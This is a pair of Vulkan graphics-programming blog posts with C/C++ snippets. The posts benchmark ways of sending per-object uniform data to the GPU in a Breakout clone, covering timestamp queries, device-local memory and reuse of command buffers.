<span class="n">VkResult</span> <span class="n">res</span> <span class="o">=</span> <span class="n">vkCreateQueryPool</span><span class="p">(</span><span class="n">device</span><span class="p">,</span> <span class="o">&</span><span class="n">createInfo</span><span class="p">,</span> <span class="n">nullptr</span><span class="p">,</span> <span class="o">&</span><span class="n">queryPool</span><span class="p">);</span>
<span class="n">assert</span><span class="p">(</span><span class="n">res</span> <span class="o">==</span> <span class="n">VK_SUCCESS</span><span class="p">);</span></code></pre></figure>
<p>Since I only want to time the part of the rendering pipeline that changes between each uniform data implementation, I only need to allocate 2 queries - one to store the timestamp immediately before the block I’m timing executes, and one to store the timestamp after it’s done.</p>
<p>With that done, all that’s left is to add the appropriate calls to the draw function:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//abbreviated code</span>
<span class="n">vkBeginCommandBuffer</span><span class="p">(</span><span class="n">commandBuffer</span><span class="p">,</span> <span class="o">&</span><span class="n">beginInfo</span><span class="p">);</span>
<span class="n">vkCmdResetQueryPool</span><span class="p">(</span><span class="n">commandBuffer</span><span class="p">,</span> <span class="n">queryPool</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="c1">//more set up code... (omitted for brevity)</span>
<span class="c1">//the block we want to time starts here</span>
<span class="n">vkCmdWriteTimestamp</span><span class="p">(</span><span class="n">commandBuffer</span><span class="p">,</span> <span class="n">VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT</span><span class="p">,</span> <span class="n">queryPool</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">PRIM_COUNT</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//per primitive logic that we want to time</span>
<span class="p">}</span>
<span class="n">vkCmdWriteTimestamp</span><span class="p">(</span><span class="n">commandBuffer</span><span class="p">,</span> <span class="n">VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT</span><span class="p">,</span> <span class="n">queryPool</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span></code></pre></figure>
<p>As you may have noticed, vkCmdWriteTimestamp takes a pipeline stage as one of its arguments. This was unintuitive for me, but here’s what the docs say about it:</p>
<blockquote>
<p>“vkCmdWriteTimestamp latches the value of the timer when all previous commands have completed executing as far as the specified pipeline stage, and writes the timestamp value to memory. When the timestamp value is written, the availability status of the query is set to available.”</p>
</blockquote>
<p>What it seems like this means (correct me if I’m wrong, internet), is that if you pass VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT to this function, you get the timestamp of when all the commands submitted to the command buffer BEFORE you call vkCmdWriteTimestamp have completed executing, whereas if you pass, for instance VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, you’d get the timestamp of when the commands before the timestamp call started execution.</p>
<p>Assuming that’s the case, then in order to measure just the execution of our loop in the above example, both calls to vkCmdWriteTimestamp need to be passed the VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT to get just the timing info for the code between the two calls.</p>
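<p>The snippet above only writes the timestamps. To turn them into a duration, the two values have to be read back once the command buffer has finished executing (vkGetQueryPoolResults is the call for that) and then scaled, because timestamps are in device ticks rather than a fixed unit. VkPhysicalDeviceLimits::timestampPeriod gives the number of nanoseconds per tick. The sketch below covers only the conversion step; the function name is made up for illustration, and a real version would fill the two tick values from the query pool.</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp">#include <cstdint>

// Converts a pair of timestamp query results into elapsed milliseconds.
// startTicks / endTicks: the two 64-bit values read back from the query pool.
// nanosecondsPerTick: VkPhysicalDeviceLimits::timestampPeriod for the device.
double elapsedMilliseconds(uint64_t startTicks, uint64_t endTicks, float nanosecondsPerTick)
{
    const uint64_t tickDelta = endTicks - startTicks;
    const double nanoseconds = static_cast<double>(tickDelta) * nanosecondsPerTick;
    return nanoseconds / 1.0e6; // 1 ms = 1,000,000 ns
}</code></pre></figure>
<p>Reading the results as 64-bit values means passing VK_QUERY_RESULT_64_BIT to vkGetQueryPoolResults; without that flag the results come back as 32-bit integers.</p>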
<p>If you recall, the frame time of each approach was measured in the last post as the following:</p>
<div align="center">
<img src="/images/post_images/2017-08-30/vktest.PNG" />
<br /><br />
</div>
<p>I re-ran this test, but this time used vkCmdWriteTimestamp to measure just the time it takes to add the primitives to the command queue and set up their uniform data:</p>
<div align="center">
<img src="/images/post_images/2017-08-30/timestamp.PNG" />
<br /><br />
</div>
<p>This data is likely of questionable usefulness because of how light the entire application is on the GPU, but it’s interesting nonetheless. It suggests that the push constant and single buffer approaches are equal in how fast they are to execute on the GPU. This might mean that the frametime difference between them was mostly due to the added time it took to memcpy data into the buffers for the single buffer approaches.</p>
<p>The multi-buffer approaches are slower than the others in this measure as well, which makes sense given that even when submitting to the command buffer, the multi-buffer branches have to change which buffers are bound all the time. However, because of how simple our frame is, all the approaches are almost exactly as fast. If the above timing code is accurate, it means that all the larger differences we’re seeing in the frametime of the application are due to the cost of memory mapping, and memcpying our uniform data around.</p>
<h2 id="dont-use-_aligned_malloc">Don’t Use _aligned_malloc</h2>
<p>The next piece of feedback came from reddit user <a href="https://www.reddit.com/user/rhynodegreat">rhynodegreat</a>, and it is directly related to the cost of memory mapping we just talked about. It was pointed out that since I was using memcpy to transfer data to a mapped buffer pointer, I didn’t need to be using _aligned_malloc for the original allocation. I admit this was a bit of cargo culting on my end. I originally figured out how to use dynamic uniform buffers from some example code I found online, and didn’t question the use of _aligned_malloc, since I had never used it before.</p>
<p>Luckily, removing it from my code was as simple as replacing any calls to it with a simple malloc call.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">uniformData</span> <span class="o">=</span> <span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="o">*</span><span class="p">)</span><span class="n">_aligned_malloc</span><span class="p">(</span><span class="n">bufferSize</span><span class="p">,</span> <span class="n">dynamicAlignment</span><span class="p">);</span></code></pre></figure>
<p>becomes</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">uniformData</span> <span class="o">=</span> <span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="n">bufferSize</span><span class="p">);</span></code></pre></figure>
<p>Everything still works with the above changes, but I was curious as to whether it had any performance implications, so I compared the DynamicUniformBuffer approach from earlier with the same approach using a regular malloc. I was going to show this in another graph, but I found no real performance difference between them, so it feels like (at least for this use case), whether to use _aligned_malloc or just malloc is a matter of preference / code portability.</p>
<div align="center">
<img src="/images/post_images/2017-08-30/boring.PNG" />
<font size="2"> How I felt when I saw a graph with all the bars the same height </font>
<br /><br />
</div>
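<p>The alignment that does matter for dynamic uniform buffers is the offset of each object’s data inside the VkBuffer: every dynamic offset has to be a multiple of the device’s minUniformBufferOffsetAlignment. Here’s a small sketch of how that per-object stride can be computed. The function names are mine and aren’t taken from the project, and the rounding trick assumes the alignment is a power of two (which the Vulkan spec requires for this limit).</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp">#include <cstddef>

// Rounds objectSize up to the next multiple of minAlignment.
// minAlignment must be a non-zero power of two.
size_t alignedStride(size_t objectSize, size_t minAlignment)
{
    return (objectSize + minAlignment - 1) & ~(minAlignment - 1);
}

// Byte offset of the idx-th object in the buffer. This is both where its
// data gets memcpy'd to and the dynamic offset used when binding for that draw.
size_t objectOffset(size_t idx, size_t stride)
{
    return idx * stride;
}</code></pre></figure>
<p>For example, an 80 byte uniform struct on a device with a 256 byte minimum alignment ends up with a 256 byte stride, so the buffer needs 256 bytes per object no matter how the CPU-side allocation was made.</p>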
<p>However, while testing this, I realized that (for the Single Buffer Approach), I could remove the need for this allocation entirely with a very small amount of effort. If I could get the mapped pointer to the buffer before I pass this data to the draw function, I could write into it directly and skip the intermediate copy. So I rearranged things a bit to try that out:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//abbreviated code</span>
<span class="n">uniformData</span> <span class="o">=</span> <span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="n">bufferSize</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">idx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">uniformChar</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">uniformData</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="k">const</span> <span class="k">auto</span><span class="o">&</span> <span class="n">prim</span> <span class="o">:</span> <span class="n">primitives</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">PrimitiveUniformObject</span> <span class="n">puo</span><span class="p">;</span>
<span class="n">puo</span><span class="p">.</span><span class="n">model</span> <span class="o">=</span> <span class="n">VIEW_PROJECTION</span> <span class="o">*</span> <span class="p">(</span><span class="n">glm</span><span class="o">::</span><span class="n">translate</span><span class="p">(</span><span class="n">prim</span><span class="p">.</span><span class="n">pos</span><span class="p">)</span> <span class="o">*</span> <span class="n">glm</span><span class="o">::</span><span class="n">scale</span><span class="p">(</span><span class="n">prim</span><span class="p">.</span><span class="n">scale</span><span class="p">));</span>
<span class="n">puo</span><span class="p">.</span><span class="n">color</span> <span class="o">=</span> <span class="n">prim</span><span class="p">.</span><span class="n">col</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">uniformChar</span><span class="p">[</span><span class="n">idx</span> <span class="o">*</span> <span class="n">dynamicAlignment</span><span class="p">],</span> <span class="o">&</span><span class="n">puo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">));</span>
<span class="n">idx</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">Renderer</span><span class="o">::</span><span class="n">draw</span><span class="p">(</span><span class="n">uniformData</span><span class="p">,</span> <span class="cm">/* other args */</span><span class="p">);</span></code></pre></figure>
<p>Becomes:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//abbreviated code</span>
<span class="kt">int</span> <span class="n">idx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">uniformChar</span> <span class="o">=</span> <span class="n">Renderer</span><span class="o">::</span><span class="n">mapBufferPtr</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="k">const</span> <span class="k">auto</span><span class="o">&</span> <span class="n">prim</span> <span class="o">:</span> <span class="n">primitives</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">PrimitiveUniformObject</span> <span class="n">puo</span><span class="p">;</span>
<span class="n">puo</span><span class="p">.</span><span class="n">model</span> <span class="o">=</span> <span class="n">VIEW_PROJECTION</span> <span class="o">*</span> <span class="p">(</span><span class="n">glm</span><span class="o">::</span><span class="n">translate</span><span class="p">(</span><span class="n">prim</span><span class="p">.</span><span class="n">pos</span><span class="p">)</span> <span class="o">*</span> <span class="n">glm</span><span class="o">::</span><span class="n">scale</span><span class="p">(</span><span class="n">prim</span><span class="p">.</span><span class="n">scale</span><span class="p">));</span>
<span class="n">puo</span><span class="p">.</span><span class="n">color</span> <span class="o">=</span> <span class="n">prim</span><span class="p">.</span><span class="n">col</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">uniformChar</span><span class="p">[</span><span class="n">idx</span> <span class="o">*</span> <span class="n">dynamicAlignment</span><span class="p">],</span> <span class="o">&</span><span class="n">puo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">));</span>
<span class="n">idx</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">Renderer</span><span class="o">::</span><span class="n">unmapBufferPtr</span><span class="p">();</span>
<span class="n">Renderer</span><span class="o">::</span><span class="n">draw</span><span class="p">(</span> <span class="cm">/* other args */</span><span class="p">);</span></code></pre></figure>
<p>The unmapBufferPtr() call can simply be omitted in order to keep things mapped all the time.</p>
<p>I decided to compare the performance of the Single-Buffer approaches with these changes vs the timing data that I presented last time, and it appears that the above changes yield a modest speed up for all approaches except using push-constants, since they didn’t need the _aligned_malloc call in the first place.</p>
<div align="center">
<img src="/images/post_images/2017-08-30/writingperf.PNG" />
<br /><br />
</div>
<p>Assuming my methodology for these tests is correct (this is outlined at the end of the post), the data points to at least a small performance improvement from removing that unnecessary memcpy, plus cleaner code, since it avoids an unnecessary allocation and copy.</p>
<h2 id="use-device-local-memory">Use Device-Local Memory</h2>
<p>I liked this piece of feedback because it forced me to actually validate an assumption I made in the previous post: that data which gets 100% updated every frame likely doesn’t benefit from being device local. So I’m starting with that as my hypothesis.</p>
<p>For the most part, changing things to use device local memory was surprisingly easy. All it took was changing what buffer was getting mapped when I wanted to transfer uniform data, and then adding code to copy that data (now in a staging buffer) to the device local memory that the shaders ended up using. Given that the nuts and bolts of using a staging buffer are already excellently presented at <a href="https://vulkan-tutorial.com/Vertex_buffers/Staging_buffer">vulkan-tutorial.com</a>, I’m going to skip talking about that here. You can always check out the <a href="https://github.com/khalladay/VkBreakout">repo</a> if you’re curious.</p>
<p>I updated the performance graph from the last post with timings using device local memory. I also included timings from vkCmdWriteTimestamp for the draw functions (again, only for the loop that created and submitted draw calls, since that’s what changed between different versions).</p>
<div align="center">
<img src="/images/post_images/2017-08-30/memorytype.PNG" />
<br /><br />
</div>
<div align="center">
<img src="/images/post_images/2017-08-30/timestamp2.PNG" />
<font size="2">In 3D to show the really small values too</font>
<br /><br />
</div>
<p>Turns out my hypothesis was wrong. Spectacularly wrong.</p>
<p>The huuuggeee increase in frametime for the multi-buffer versions took me off guard. It’s so high that I’m wondering if I’m not making another weird mistake in my implementation (please, spot my mistake in <a href="https://github.com/khalladay/VkBreakout/blob/02-Multi-Buffer-KeepMapped/Breakout/Renderer.cpp">the renderer.cpp file</a>), but I suppose it does make some sense, given that we’re asking the gpu to do 5000 copy buffer operations every frame in addition to everything else.</p>
<p>That being said, for the single buffer approach, using device-local memory pushed its average time per frame to the same speed as using push-constants, which is interesting, but I’m not sure I expect that to hold up given heavier loads (although I’m not sure which one would win in that case). Sounds like something to test in a later (more complex) project.</p>
<p>For now though, the message from this test is clear: use device-local memory for data which doesn’t get updated frequently (or at least, which doesn’t require a lot of copy buffer operations per frame).</p>
<p>Last note - the two graphs were generated in different runs of testing, so the numbers don’t 100% add up between the two of them, but they’re close enough for me to feel comfortable drawing early conclusions about how to use Vulkan, so I’m not losing any sleep over it.</p>
<h2 id="re-use-command-buffers">Re-use Command Buffers</h2>
<p>The last bit of advice that I wanted to look into was that I am wasting time recreating command buffers that are mostly identical every frame. The only time the command buffer actually changes is when a brick gets removed. Since all the tests that I’m running involve a static scene anyway, I’m going to work around that here by just having logic move the hit bricks off-screen, instead of removing them. I definitely couldn’t get away with changes like this on a real project, but it works well enough to get some performance data in this case.</p>
<p>I made a few changes to the project so that the actual draw function doesn’t record any commands, it simply submits the pre-recorded command buffers that are generated at the beginning of the project. Unsurprisingly, this is pretty good for performance:</p>
<div align="center">
<img src="/images/post_images/2017-08-30/reuse1.PNG" />
<font size="2">You can't reuse a command buffer with push constants (as far as I know)</font>
<br /><br />
</div>
<p>From the graph, you can see how much this improves the performance of basically everything. In fact, compared to everything else that I tried, reusing command buffers was by far the single most impactful thing for the performance of the program. It literally made almost everything (except mapping a per object buffer every frame) faster than the push-constant approach, which so far has been the most performant way to do things in every test. I assume that even a less aggressive buffer re-use strategy would pay dividends in a more complex project, and I’m certainly going to be structuring future projects to take advantage of this as much as possible.</p>
<p>I also decided to test to see how these improvements fared when using device-local memory:</p>
<div align="center">
<img src="/images/post_images/2017-08-30/reuse2.png" />
<br /><br />
</div>
<p>Maybe anticlimactically (since this is my last graph), for the single buffer approaches this did basically nothing. For the multi-buffer approaches, the overhead of doing a vkCmdCopyBuffer for each object every frame still hit performance so hard that reusing the command buffers really didn’t matter. The lesson to gain from all this: pay attention to how often you update a chunk of data before deciding to make it device-local, since that could be doing more harm than good.</p>
<p>I would have taken vulkan timestamp measurements of all of this, but I realized after taking data down the first time that I had changed the first timestamp call to VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT to test something out earlier and had forgotten to change it back, making any timestamp data I got here completely useless for comparing against previous data, and I’m sick to death of this Breakout clone, so I decided to just press on and omit those measurements.</p>
<h2 id="conclusion">Conclusion</h2>
<p>That’s all for today! When I started making my little Breakout clone, I had no idea that it was going to turn out to be so informative! That being said, I need to move on now. There were some bits of advice that I got that I really liked, that I didn’t end up trying out here simply to save my sanity. This code was never written to be anything other than throwaway code, and it’s time to throw it all out and start fresh. Who knows, maybe my next foray into vulkan will even have textures!</p>
<p>If you spot any errors (there’s likely a ton) in the above code, or just want to say hi, I’m always around <a href="https://twitter.com/khalladay">on Twitter</a>! I’ve learned more from people pointing out my mistakes in the past week than I did actually building this thing from scratch, so keep the feedback coming!</p>
<font size="2"><div style="border-style:solid; background-color:#DDDDDD ">
<strong>Appendix: Testing Methodology</strong><br />
In case reviewing testing methods is your thing, here's how I got the numbers in all the graphs in this post:<br /><br />
<li>When testing, the time step of the game logic was set to 0 (rather than deltaTime), so that any variations in frame rate from things like removing bricks, or handling game restart logic were eliminated. Then, the game was run for 20k frames, reporting the average frametime after every 5k frames. This gave me 4 average frame time numbers. I discarded the highest and lowest of these numbers, and then averaged the two remaining values to produce an average frametime for the test.</li><br />
<li>I monitored my CPU and GPU temp with the <a href="https://camwebapp.com/">Cam Web App</a>, and let both of them return to their resting temp between tests (61 and 66 C respectively), and made sure that the same applications (and only those applications) were running alongside the breakout program.</li><br />
<li>I repeated this test 2 more times, at different times of the day (after using the laptop to do other tasks), which gave me 3 frametime averages (1 per run of the test). I chose the median of the three to present in the graph above.</li><br />
<li>Unless vkCmdWriteTimestamp data was included in the graph, the calls to vkCmdWriteTimestamp were removed via an ifdef.</li><br />
<li>Finally, all tests were done in Release builds, without a debugger attached or any validation layers turned on, and connected to a wall outlet to prevent any kind of battery throttling from interfering with the results.</li><br />
<li>All the source for everything is <a href="https://github.com/khalladay/VkBreakout">on github</a>, I would love for someone to compile everything and run a similar test to see if the results for my GPU can be replicated on someone else's hardware.</li>
</div>
</font>
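<p>The averaging steps from the appendix can be written out as a couple of small functions. This is only a sketch of the arithmetic described above, not the code that was actually used to collect the numbers, and the function names are invented for the example.</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp">#include <algorithm>
#include <array>

// One test run: four 5k-frame averages go in, the highest and lowest are
// discarded, and the remaining two are averaged.
double runAverage(std::array<double, 4> chunkAverages)
{
    std::sort(chunkAverages.begin(), chunkAverages.end());
    return (chunkAverages[1] + chunkAverages[2]) / 2.0;
}

// Three runs at different times of day: the median is the value that gets graphed.
double medianOfRuns(std::array<double, 3> runAverages)
{
    std::sort(runAverages.begin(), runAverages.end());
    return runAverages[1];
}</code></pre></figure>
<p>Dropping the extremes before averaging, and then taking a median across runs, keeps a single noisy 5k-frame window (or one bad run) from dragging the reported frametime around.</p>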
Comparing Uniform Data Transfer Methods in Vulkan
2017-08-13T00:00:00+00:00
http://kylehalladay.com/blog/tutorial/vulkan/2017/08/13/Vulkan-Uniform-Buffers
<p>Lately I’ve been trying to wrap my head around Vulkan. As part of that, I’ve been building a small Breakout clone (<a href="https://github.com/khalladay/VkBreakout">github</a>) as a way to see how the pieces of the API fit together in a “real” application.</p>
<p>When I’m starting to learn a new graphics API, the thing that I try to focus on is getting used to all the different ways to send data from the CPU to the GPU. Since my Breakout clone didn’t have textures, or meshes (really) to speak of, that left the per frame uniform data for each object on screen.</p>
<div align="center">
<img src="/images/post_images/2017-08-13/breakout.png" />
<font size="2">The "Playable" version of the Breakout Clone</font>
<br /><br />
</div>
<p>Looking at a few vulkan examples I could find, and taking a quick glance through the API, I settled on 5 different options for getting my uniform data sent to the card:</p>
<ul>
<li>Using push-constants</li>
<li>Using 1 VkBuffer and keeping it mapped all the time</li>
<li>Using 1 VkBuffer and mapping/unmapping per frame</li>
<li>Using multiple VkBuffers, and keeping them all mapped</li>
<li>Using multiple VkBuffers, and mapping/unmapping every frame
<br /><br /></li>
</ul>
<p>All the guidelines out there are pretty clear when they say to use push-constants for data that has to change on a per-object basis every frame, but given that push constants have a size limit, it made sense to give each of the above approaches a whirl, since they conceivably all will have their place in a large application.</p>
<p>So, in the interest of whirling, I put a branch in my repo for each, and then tracked the average frame-time of each to see how much faster or slower each approach was.</p>
<p>However, Breakout is really not a good test for a GTX 1060, and with 500 blocks on screen, I was running every test at < 1 ms per frame. The times were so small, that even between runs of the exact same version of the program, the results were too varied to be much use (since even a change in measured time of 1/100th of an ms became significant). To make things a bit easier to work with, I added a mode to the game which rendered 5000 blocks at a time.</p>
<div align="center">
<img src="/images/post_images/2017-08-13/stresstest.PNG" />
<font size="2">which admittedly looked sorta ridiculous</font>
<br /><br />
</div>
<p>This produced much more stable results (i.e. they could be reproduced across multiple runs), which I want to provide here to give context to the rest of this blog post.</p>
<div align="center">
<img src="/images/post_images/2017-08-13/vktest.PNG" />
<br />
</div>
<p>The big takeaway here is that mapping memory is a really slow process, so if you need something mapped, keep it that way for as long as you can. This is likely not news to anyone except me, since I’ve been living in mobile engine land for my whole career and really haven’t had to worry about that. Oh, and the guides were right, you should totally use push constants when you can. If you can’t use them, there’s a slight advantage to packing multiple objects’ worth of data into a single buffer, vs giving every object its own.</p>
<p>With that in mind, I want to walk through the implementation details of each approach, because I wish something like that had existed before I started down this rabbit hole. If you were only interested in the performance results, you can stop reading and go about your life :) If you’re scratching your head as to how to do one or more of these things, join me below!</p>
<h2 id="preliminary-info">Preliminary info</h2>
<p>In order to make much sense of the code I’m going to share, it will be helpful to understand that my code stores uniform data that will be sent to the GPU in a struct called PrimitiveUniformObject, which directly maps to the layout of the uniform data in the shader:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//CPU</span>
<span class="k">struct</span> <span class="n">PrimitiveUniformObject</span>
<span class="p">{</span>
<span class="n">glm</span><span class="o">::</span><span class="n">mat4</span> <span class="n">model</span><span class="p">;</span>
<span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">color</span><span class="p">;</span>
<span class="p">};</span>
<span class="c1">//glsl</span>
<span class="n">layout</span><span class="p">(</span><span class="n">set</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">binding</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">PER_OBJECT</span>
<span class="p">{</span>
<span class="n">mat4</span> <span class="n">mvp</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span> <span class="n">obj</span><span class="p">;</span></code></pre></figure>
<p>Hopefully that makes sense! I’m going to try to keep all the snippets I share abbreviated enough that you otherwise don’t need to care about how I structured things, but I couldn’t get around telling you about this tiny bit.</p>
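<p>To make the “directly maps” part a bit more concrete, here’s a minimal sketch that checks the CPU struct against the offsets the std140 layout rules give for that glsl block. Mat4 and Vec4 are stand-ins I made up so the snippet compiles without glm (they assume tightly packed 4 byte floats, like glm’s defaults), so treat the numbers as an illustration rather than something lifted from the project.</p>

```cpp
#include <cassert>
#include <cstddef>

// Stand-ins for glm::mat4 and glm::vec4 (assumption: tightly packed floats).
struct Mat4 { float m[16]; };
struct Vec4 { float v[4]; };

struct PrimitiveUniformObject
{
    Mat4 model; // lines up with "mat4 mvp" in the shader block
    Vec4 color; // lines up with "vec4 col" in the shader block
};

// std140 places the mat4 at offset 0 (64 bytes) and the vec4 right after it.
static_assert(offsetof(PrimitiveUniformObject, model) == 0, "mvp starts the block");
static_assert(offsetof(PrimitiveUniformObject, color) == 64, "col follows the matrix");
static_assert(sizeof(PrimitiveUniformObject) == 80, "mat4 (64) + vec4 (16)");
```

<p>If you add members to the struct later (a lone float or a vec3, for example), std140 padding can stop the two layouts from agreeing, and checks like these are a cheap way to notice.</p>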
<p>I’m also going to assume that you’re at least at the level I was when I started this project, that is, you’ve gone through <a href="https://vulkan-tutorial.com/">vulkan-tutorial.com</a>, and therefore understand how to allocate a VkBuffer. If you aren’t there yet, click the link to the tutorial and come back in a few hours. Things will make much more sense.</p>
<h2 id="multiple-unmapped-buffers">Multiple, Unmapped Buffers</h2>
<p>Let’s start by talking about the approach that felt most intuitive to me right off the bat: giving each drawable entity (which my code calls a Primitive) its own VkBuffer to store its own uniform data, and a VkDescriptorSet to know about that buffer:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">PrimitiveInstance</span>
<span class="p">{</span>
<span class="n">vec3</span> <span class="n">pos</span><span class="p">;</span>
<span class="n">vec3</span> <span class="n">scale</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">col</span><span class="p">;</span>
<span class="n">VkBuffer</span> <span class="n">uniformBuffer</span><span class="p">;</span>
<span class="n">VkDescriptorSet</span> <span class="n">descSet</span><span class="p">;</span>
<span class="n">VkDeviceMemory</span> <span class="n">bufferMem</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">meshID</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>My project was simple enough (and my gpu forgiving enough) that I could get away with doing a VkDeviceMemory allocation for every primitive. On a larger project you’d have to do something smarter than that.</p>
<p>Since the entirety of the data stored in the VkBuffer is going to get updated every frame, and we’re going to update the data with a single write to the buffer data, I allocated the VkBuffers with host coherent memory, which makes things nice and easy when it’s time to update the data:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//abbreviated code:</span>
<span class="n">PrimitiveUniformObject</span> <span class="n">puo</span><span class="p">;</span>
<span class="n">puo</span><span class="p">.</span><span class="n">model</span> <span class="o">=</span> <span class="n">VIEW_PROJECTION</span> <span class="o">*</span> <span class="p">(</span><span class="n">glm</span><span class="o">::</span><span class="n">translate</span><span class="p">(</span><span class="n">pos</span><span class="p">)</span> <span class="o">*</span> <span class="n">glm</span><span class="o">::</span><span class="n">scale</span><span class="p">(</span><span class="n">scale</span><span class="p">));</span>
<span class="n">puo</span><span class="p">.</span><span class="n">color</span> <span class="o">=</span> <span class="n">col</span><span class="p">;</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">udata</span> <span class="o">=</span> <span class="n">nullptr</span><span class="p">;</span>
<span class="n">vkMapMemory</span><span class="p">(</span><span class="n">device</span><span class="p">,</span> <span class="n">bufferMem</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">),</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">udata</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">udata</span><span class="p">,</span> <span class="o">&</span><span class="n">puo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">));</span>
<span class="n">vkUnmapMemory</span><span class="p">(</span><span class="n">device</span><span class="p">,</span> <span class="n">bufferMem</span><span class="p">);</span></code></pre></figure>
<p>Since we’ve already taken a look at the performance graph, we know that mapping/unmapping the buffer for each Primitive, every frame, is a performance killer. We can work around that with the next approach and get much better results.</p>
<h2 id="multiple-always-mapped-buffers">Multiple, Always Mapped Buffers</h2>
<p>To make the multiple buffer approach faster, all we need to do is to add one more variable to the PrimitiveInstance struct:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">PrimitiveInstance</span>
<span class="p">{</span>
<span class="n">vec3</span> <span class="n">pos</span><span class="p">;</span>
<span class="n">vec3</span> <span class="n">scale</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">col</span><span class="p">;</span>
<span class="n">VkBuffer</span> <span class="n">uniformBuffer</span><span class="p">;</span>
<span class="n">VkDescriptorSet</span> <span class="n">descSet</span><span class="p">;</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">mapped</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">meshID</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>In this approach, when a primitive was created, the memory for its buffer was immediately mapped, and the address stored in the mapped pointer above. Note that the PrimitiveInstance struct doesn’t contain a PrimitiveUniformObject; those get created per frame by combining the easier to work with variables we have here.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//abbreviated code:</span>
<span class="n">PrimitiveUniformObject</span> <span class="n">puo</span><span class="p">;</span>
<span class="n">puo</span><span class="p">.</span><span class="n">model</span> <span class="o">=</span> <span class="n">VIEW_PROJECTION</span> <span class="o">*</span> <span class="p">(</span><span class="n">glm</span><span class="o">::</span><span class="n">translate</span><span class="p">(</span><span class="n">pos</span><span class="p">)</span> <span class="o">*</span> <span class="n">glm</span><span class="o">::</span><span class="n">scale</span><span class="p">(</span><span class="n">scale</span><span class="p">));</span>
<span class="n">puo</span><span class="p">.</span><span class="n">color</span> <span class="o">=</span> <span class="n">col</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">mapped</span><span class="p">,</span> <span class="o">&</span><span class="n">puo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">));</span></code></pre></figure>
<p>Then, all that’s needed is to submit each object’s descriptorSet to the rendering function, and pass the right one to vkCmdBindDescriptorSets at the right time. As you saw in the graph earlier, this approach was the slowest of the three approaches that didn’t involve mapping/unmapping data every frame.</p>
